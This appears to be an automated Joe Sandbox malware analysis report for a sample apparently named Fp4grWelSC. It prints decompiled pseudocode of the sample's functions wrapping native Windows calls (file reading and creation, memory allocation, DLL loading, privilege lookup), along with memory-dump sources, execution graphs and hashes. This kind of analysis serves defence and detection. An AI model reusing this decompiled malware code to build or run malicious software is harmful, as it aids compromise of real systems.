                                    						asm("sbb [ebx+ebp], ecx");
                                    						asm("sbb dl, [edi]");
                                    						_push(ss);
                                    						asm("sbb [ebx+ebp], cl");
                                    						asm("adc bl, [eax]");
                                    						_push(cs);
                                    						asm("sbb [ebx+ebp], cl");
                                    						_t659 = _t657 |  *_t681;
                                    						_t269 = _t264 | 0x2b;
                                    						_push(es);
                                    						if(_t269 < 0) {
                                    							 *_t269 =  *_t269 + _t269;
                                    							_t549 = _t549 |  *(_t659 + 8);
                                    							_t539 = _t269 -  *_t659;
                                    							_t608 = _t608 +  *_t539;
                                    							asm("sbb eax, 0xa0000");
                                    							asm("adc esi, [eax]");
                                    							_t269 = _t539 -  *_t539;
                                    							asm("pushad");
                                    							 *_t269 =  *_t269 + _t269;
                                    							 *((intOrPtr*)(_t269 + _t269)) =  *((intOrPtr*)(_t269 + _t269)) + _t269;
                                    							 *_t608 =  *_t608 + _t659;
                                    						}
                                    						_t660 = _t659 +  *((intOrPtr*)(0x4000012 + _t676 * 2));
                                    						_t609 = _t608 +  *_t269;
                                    						_push(ds);
                                    						 *_t269 =  *_t269 + _t269;
                                    						_t270 = _t269 |  *_t269;
                                    						 *_t660 =  *_t660 + _t270;
                                    						_t678 = _t676 +  *((intOrPtr*)(_t687 + 0x10));
                                    						 *_t270 =  *_t270 + _t270;
                                    						_t272 = _t270 + 0x7f;
                                    						asm("adc [eax], eax");
                                    						 *((intOrPtr*)(_t660 + _t272)) =  *((intOrPtr*)(_t660 + _t272)) + _t272;
                                    						 *_t609 =  *_t609 - _t272;
                                    						 *_t272 =  *_t272 + _t272;
                                    						_push(es);
                                    						 *_t681 =  *_t681 + _t660;
                                    						_t610 = _t609 |  *_t549;
                                    						_t273 = _t272 &  *_t660;
                                    						if(_t273 == 0) {
                                    							 *_t273 =  *_t273 + _t273;
                                    							_t535 = _t273 + 0x6f;
                                    							_pop(ds);
                                    							 *_t535 =  *_t535 + _t535;
                                    							_t660 = _t660 |  *(_t549 + 0xe);
                                    							 *_t535 =  *_t535 + _t535;
                                    							_t536 = _t535 & 0x00026f06;
                                    							 *_t681 =  *_t681 + _t536;
                                    							 *((intOrPtr*)(_t678 + 0x20)) =  *((intOrPtr*)(_t678 + 0x20)) + _t610;
                                    							 *_t536 =  *_t536 + _t536;
                                    							ss = es;
                                    							_t538 = es;
                                    							_t273 = _t538 |  *_t681;
                                    							 *((char*)(_t549 + _t610)) =  *((char*)(_t549 + _t610)) + 1;
                                    							es = ds;
                                    						}
                                    						_t274 = _t273 - 0x257b02d6;
                                    						 *_t274 =  *_t274 + _t274;
                                    						_t275 = _t274 + 0x16;
                                    						asm("outsd");
                                    						 *_t275 =  *_t275 & _t275;
                                    						 *_t660 =  *_t660 + _t610;
                                    						 *_t660 =  *_t660 + _t610;
                                    						_t682 = _t681 - 1;
                                    						 *_t660 =  *_t660 + _t275;
                                    						if( *_t660 != 0) {
                                    							L32:
                                    							_t276 = _t275 & 0x00000000;
                                    							 *_t660 =  *_t660 + _t610;
                                    							if( *_t660 != 0) {
                                    								 *_t276 =  *_t276 + _t276;
                                    							}
                                    							_t610 = _t610 +  *((intOrPtr*)(_t678 + 0xd));
                                    							 *_t276 =  *_t276 + _t276;
                                    							_push(es);
                                    							 *_t660 =  *_t660 - _t660;
                                    							 *_t276 =  *_t276 + _t276;
                                    							_push(es);
                                    							 *_t660 =  *_t660 + _t610;
                                    							 *_t549 =  *_t549 + _t660;
                                    							 *0x8200 =  *0x8200 ^ _t276;
                                    							 *0x110000 =  *0x110000 + _t276;
                                    						} else {
                                    							 *_t275 =  *_t275 + _t275;
                                    							 *_t660 =  *_t660 + _t610;
                                    							asm("outsd");
                                    							_t534 = _t275 + 0x0000006f &  *(_t275 + 0x6f) &  *(_t275 + 0x0000006f &  *(_t275 + 0x6f));
                                    							 *_t660 =  *_t660 + _t610;
                                    							 *_t660 =  *_t660 + _t610;
                                    							if ( *_t660 != 0) goto L30;
                                    							_t276 = _t534 +  *_t660;
                                    							if(_t276 == 0) {
                                    								 *_t276 =  *_t276 + _t276;
                                    								_t275 = _t276 + 0x6f;
                                    								goto L32;
                                    							}
                                    						}
                                    						asm("adc [eax], eax");
                                    						_t550 = _t549 +  *((intOrPtr*)(_t549 + 0x22));
                                    						 *_t276 =  *_t276 + _t276;
                                    						_t277 = _t276 + 2;
                                    						if(_t277 != 0) {
                                    							L38:
                                    							_t550 = _t550 +  *((intOrPtr*)(_t610 + 0xa));
                                    							_push(es);
                                    							_push(ss);
                                    							 *_t610 =  *_t610 + 1;
                                    						} else {
                                    							 *_t277 =  *_t277 + _t277;
                                    							_t277 = _t277 + 2;
                                    							if(_t277 == 0) {
                                    								 *_t277 =  *_t277 + _t277;
                                    								_t530 = _t277 + 0x00000017 & 0x00256f0c;
                                    								 *_t660 =  *_t660 + _t610;
                                    								 *_t530 =  *_t530 + _t610;
                                    								_t531 = _t530 & 0x00256f0b;
                                    								 *_t660 =  *_t660 + _t610;
                                    								 *_t678 =  *_t678 + _t531;
                                    								asm("outsd");
                                    								_t277 = _t531 & 0x000a0000;
                                    								asm("sbb [ebx], eax");
                                    								goto L38;
                                    							}
                                    						}
                                    						_t278 = _t277 | 0x2b022c09;
                                    						_t679 = _t678 + 1;
                                    						_t551 = _t550 +  *((intOrPtr*)(_t550 + 0x22));
                                    						 *_t278 =  *_t278 + _t278;
                                    						asm("outsd");
                                    						ss = es;
                                    						_pop(_t611);
                                    						_push(ss);
                                    						 *_t611 =  *_t611 + 1;
                                    						asm("adc eax, [ecx+edx]");
                                    						_t612 = _t611 +  *_t551;
                                    						_t283 = (_t278 + 0x00000016 & 0x000a0000 |  *_t682) + 0x2c -  *_t660;
                                    						if(_t283 == 0) {
                                    							 *_t283 =  *_t283 + _t283;
                                    							asm("outsd");
                                    							ss = es;
                                    							_pop(_t641);
                                    							_t528 = _t283 + 0x00000016 & 0x000a0000 |  *_t682;
                                    							_push(ss);
                                    							 *_t641 =  *_t641 + 1;
                                    							asm("adc eax, [0x22c0511]");
                                    							_t612 = _t641 -  *0x247b02;
                                    							 *((intOrPtr*)(_t682 + _t660)) =  *((intOrPtr*)(_t682 + _t660)) + _t528;
                                    							asm("outsd");
                                    							_t283 = _t528 & 0x000a0000;
                                    						}
                                    						 *_t283 =  *_t283 + _t283;
                                    						_t285 = (_t283 |  *_t283) -  *(_t283 |  *_t283);
                                    						 *_t551 =  *_t551 + _t660;
                                    						 *_t660 =  *_t660 ^ _t285;
                                    						 *_t682 =  *_t682 + _t612;
                                    						 *_t285 =  *_t285 + _t285;
                                    						 *_t682 =  *_t682 + _t285;
                                    						 *_t285 =  *_t285 + _t285;
                                    						asm("adc [eax], eax");
                                    						_t688 = _t687 +  *_t285;
                                    						asm("sbb al, [eax]");
                                    						 *_t660 =  *_t660 + _t612;
                                    						_t286 = _t285 - 0x266f030d;
                                    						 *_t286 = _t286 +  *_t286;
                                    						_t613 = _t612 |  *_t286;
                                    						asm("sbb al, [eax]");
                                    						 *_t660 =  *_t660 + _t613;
                                    						_pop(ss);
                                    						_push(ss);
                                    						_t291 = (_t286 -  *_t613 |  *_t679) - 0x00000004 | 0x2800122b;
                                    						asm("daa");
                                    						 *_t291 =  *_t291 + _t291;
                                    						_push(es);
                                    						_t293 = _t291 |  *_t682 | 0x0000002b;
                                    						 *_t293 =  *_t293 + _t613;
                                    						_t294 = _t293 -  *_t293;
                                    						 *_t551 =  *_t551 + _t660;
                                    						 *0x10500 =  *0x10500 ^ _t294;
                                    						 *_t679 =  *_t679 + _t294;
                                    						 *_t294 =  *_t294 + _t294;
                                    						asm("adc [eax], eax");
                                    						if( *_t294 < 0) {
                                    							 *_t294 =  *_t294 + _t294;
                                    							_push(es);
                                    							_t525 = _t294 & 0x00257b02;
                                    							 *((intOrPtr*)(_t679 + _t688 * 2)) =  *((intOrPtr*)(_t679 + _t688 * 2)) + _t525;
                                    							_t294 = _t525 & 0x00000000;
                                    							 *_t660 =  *_t660 + _t613;
                                    						}
                                    						_t661 = _t660 |  *(_t660 + _t294);
                                    					}
                                    				}
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.687786905.0000000000372000.00000002.00020000.sdmp, Offset: 00370000, based on PE: true
                                    • Associated: 00000000.00000002.687776022.0000000000370000.00000002.00020000.sdmp
                                    • Associated: 00000000.00000002.687988919.00000000003D8000.00000002.00020000.sdmp
                                    • Associated: 00000000.00000002.688004733.00000000003DF000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_370000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:7.7%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.1%
                                    Total number of Nodes:682
                                    Total number of Limit Nodes:71

                                    Graph


                                    Executed Functions

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 41868a-4186d9 call 4191e0 NtReadFile
                                    C-Code - Quality: 25%
                                    			E0041868A(void* __ebx, void* __edx, void* __edi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
                                    				intOrPtr _v0;
                                    				void* _t18;
                                    				void* _t31;
                                    				void* _t32;
                                    				intOrPtr* _t33;
                                    				void* _t35;
                                    
                                    				_t31 = __edi + 1;
                                    				asm("stosb");
                                    				_t13 = _v0;
                                    				_t33 = _v0 + 0xc48;
                                    				E004191E0(_t31, _t13, _t33,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                    				_t4 =  &_a36; // 0x413a31
                                    				_t6 =  &_a28; // 0x413d72
                                    				_t12 =  &_a4; // 0x413d72
                                    				_t18 =  *((intOrPtr*)( *_t33))( *_t12, _a8, _a12, _a16, _a20, _a24,  *_t6, _a32,  *_t4, _t32, _t35, _t35); // executed
                                    				return _t18;
                                    			}










                                    APIs
                                    • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: 1:A$r=A$r=A
                                    • API String ID: 2738559852-4243674446
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3 418690-4186a6 4 4186ac-4186d9 NtReadFile 3->4 5 4186a7 call 4191e0 3->5 5->4
                                    C-Code - Quality: 37%
                                    			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                    				void* _t18;
                                    				void* _t27;
                                    				intOrPtr* _t28;
                                    
                                    				_t13 = _a4;
                                    				_t28 = _a4 + 0xc48;
                                    				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                    				_t4 =  &_a40; // 0x413a31
                                    				_t6 =  &_a32; // 0x413d72
                                    				_t12 =  &_a8; // 0x413d72
                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                    				return _t18;
                                    			}






                                    APIs
                                    • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: 1:A$r=A$r=A
                                    • API String ID: 2738559852-4243674446
                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                    • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                    • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 359 409b40-409b69 call 41af70 362 409b6b-409b6e 359->362 363 409b6f-409b7d call 41b390 359->363 366 409b8d-409b9e call 419720 363->366 367 409b7f-409b8a call 41b610 363->367 372 409ba0-409bb4 LdrLoadDll 366->372 373 409bb7-409bba 366->373 367->366 372->373
                                    C-Code - Quality: 100%
                                    			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
                                    				char* _v8;
                                    				struct _EXCEPTION_RECORD _v12;
                                    				struct _OBJDIR_INFORMATION _v16;
                                    				char _v536;
                                    				void* _t15;
                                    				struct _OBJDIR_INFORMATION _t17;
                                    				struct _OBJDIR_INFORMATION _t18;
                                    				void* _t30;
                                    				void* _t31;
                                    				void* _t32;
                                    
                                    				_v8 =  &_v536;
                                    				_t15 = E0041AF70( &_v12, 0x104, _a8);
                                    				_t31 = _t30 + 0xc;
                                    				if(_t15 != 0) {
                                    					_t17 = E0041B390(__eflags, _v8);
                                    					_t32 = _t31 + 4;
                                    					__eflags = _t17;
                                    					if(_t17 != 0) {
                                    						E0041B610( &_v12, 0);
                                    						_t32 = _t32 + 8;
                                    					}
                                    					_t18 = E00419720(_v8);
                                    					_v16 = _t18;
                                    					__eflags = _t18;
                                    					if(_t18 == 0) {
                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                    						return _v16;
                                    					}
                                    					return _t18;
                                    				} else {
                                    					return _t15;
                                    				}
                                    			}













                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                    • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                    • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 374 4185e0-418631 call 4191e0 NtCreateFile
                                    C-Code - Quality: 100%
                                    			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                    				long _t21;
                                    				void* _t31;
                                    
                                    				_t3 = _a4 + 0xc40; // 0xc40
                                    				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                    				return _t21;
                                    			}





                                    APIs
                                    • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                    • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                    • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 377 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                                    C-Code - Quality: 100%
                                    			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                    				long _t14;
                                    				void* _t21;
                                    
                                    				_t3 = _a4 + 0xc60; // 0xca0
                                    				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                    				return _t14;
                                    			}





                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E0041870A(void* __eax, void* _a4) {
                                    				intOrPtr _v0;
                                    				long _t9;
                                    				void* _t13;
                                    
                                    				asm("insb");
                                    				_push(0x55);
                                    				_t6 = _v0;
                                    				_t2 = _t6 + 0x10; // 0x300
                                    				_t3 = _t6 + 0xc50; // 0x409763
                                    				E004191E0(_t13, _v0, _t3,  *_t2, 0, 0x2c);
                                    				_t9 = NtClose(_a4); // executed
                                    				return _t9;
                                    			}






                                    APIs
                                    • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 94385ea2607e99e4f23a75cd1ac8a344ae37783ce295fd67e074d6fe845f6f19
                                    • Instruction ID: adb5d7824efa5989c72cc655c2277b3281c8e514d962a6123890b825eb6125c1
                                    • Opcode Fuzzy Hash: 94385ea2607e99e4f23a75cd1ac8a344ae37783ce295fd67e074d6fe845f6f19
                                    • Instruction Fuzzy Hash: CCE08C352402047BE710EB98CC55FD73B59EB48791F108459FA585B282C530EA00C7D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00418710(intOrPtr _a4, void* _a8) {
                                    				long _t8;
                                    				void* _t11;
                                    
                                    				_t5 = _a4;
                                    				_t2 = _t5 + 0x10; // 0x300
                                    				_t3 = _t5 + 0xc50; // 0x409763
                                    				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                    				_t8 = NtClose(_a8); // executed
                                    				return _t8;
                                    			}





                                    APIs
                                    • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E004088D0(intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				char _v24;
                                    				char _v284;
                                    				char _v804;
                                    				char _v840;
                                    				void* _t24;
                                    				void* _t31;
                                    				void* _t33;
                                    				void* _t34;
                                    				void* _t39;
                                    				void* _t50;
                                    				intOrPtr _t52;
                                    				void* _t53;
                                    				void* _t54;
                                    				void* _t55;
                                    				void* _t56;
                                    
                                    				_t52 = _a4;
                                    				_t39 = 0; // executed
                                    				_t24 = E00406E20(_t52,  &_v24); // executed
                                    				_t54 = _t53 + 8;
                                    				if(_t24 != 0) {
                                    					E00407030( &_v24,  &_v840);
                                    					_t55 = _t54 + 8;
                                    					do {
                                    						E0041A0F0( &_v284, 0x104);
                                    						E0041A760( &_v284,  &_v804);
                                    						_t56 = _t55 + 0x10;
                                    						_t50 = 0x4f;
                                    						while(1) {
                                    							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
                                    							_t56 = _t56 + 0x10;
                                    							if(_t31 != 0) {
                                    								break;
                                    							}
                                    							_t50 = _t50 + 1;
                                    							if(_t50 <= 0x62) {
                                    								continue;
                                    							} else {
                                    							}
                                    							goto L8;
                                    						}
                                    						_t9 = _t52 + 0x14; // 0xffffe1a5
                                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                    						_t39 = 1;
                                    						L8:
                                    						_t33 = E00407060( &_v24,  &_v840);
                                    						_t55 = _t56 + 8;
                                    					} while (_t33 != 0 && _t39 == 0);
                                    					_t34 = E004070E0(_t52,  &_v24); // executed
                                    					if(_t39 == 0) {
                                    						asm("rdtsc");
                                    						asm("rdtsc");
                                    						_v8 = _t34 - 0 + _t34;
                                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                    					}
                                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                    					_t20 = _t52 + 0x31; // 0x5608758b
                                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                    					return 1;
                                    				} else {
                                    					return _t24;
                                    				}
                                    			}



















                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                    • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                    • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                    • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                    • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateFree
                                    • String ID: 65A
                                    • API String ID: 2488874121-2085483392
                                    • Opcode ID: 6c8c8128c4855ca991e59b4003b406146ec2f9488d046d84f0c217ef94da80e6
                                    • Instruction ID: f0af90bf23ae137f33001e0d1086360710761a1baabbe4536e4bec7e110539d6
                                    • Opcode Fuzzy Hash: 6c8c8128c4855ca991e59b4003b406146ec2f9488d046d84f0c217ef94da80e6
                                    • Instruction Fuzzy Hash: 43018CB5204215AFDB14EFA5DC84DEB376DEF85354F01855AFD088B242CA30E954CBB4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 15 418a41-418a43 16 418a53-418a6a call 4191e0 15->16 17 418a45 15->17 23 418a6f-418a84 LookupPrivilegeValueW 16->23 18 4189d5-4189d7 17->18 19 418a47-418a4e 17->19 21 4189df-4189f4 18->21 22 4189da call 4191e0 18->22 19->16 22->21
                                    C-Code - Quality: 50%
                                    			E00418A41(void* __eax, void* __ebx, signed int __ecx, void* __edx, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20) {
                                    				int _t14;
                                    				void* _t24;
                                    				signed int _t28;
                                    				signed int _t29;
                                    
                                    				_t29 = _t28 ^ __ecx;
                                    				if(_t29 <= 0) {
                                    					asm("loop 0xffffff90");
                                    					asm("std");
                                    					asm("rcr byte [ebp-0x38], 0x31");
                                    					_push(_t29);
                                    				}
                                    				_t11 = _a8;
                                    				E004191E0(_t24, _a8, _a8 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
                                    				_t14 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
                                    				return _t14;
                                    			}







                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_400000_Fp4grWelSC.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID: 1
                                    • API String ID: 3899507212-2212294583
                                    • Opcode ID: 41bf37c81134509337144ca1c81adef433eb69cc6daac1ebcb3bcb6f4b686dab
                                    • Instruction ID: d5abc8786f01bb17d7a6fe162d8270b814f0c07a923b4f552728b3bf6c6c65f9
                                    • Opcode Fuzzy Hash: 41bf37c81134509337144ca1c81adef433eb69cc6daac1ebcb3bcb6f4b686dab
                                    • Instruction Fuzzy Hash: 3301ADB52002056BEB10DF54DC80EEB77A9EF84354F00816AF80857342CA74E954C7E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 25 4188b0-4188c6 26 4188cc-4188e1 RtlAllocateHeap 25->26 27 4188c7 call 4191e0 25->27 27->26
                                    APIs
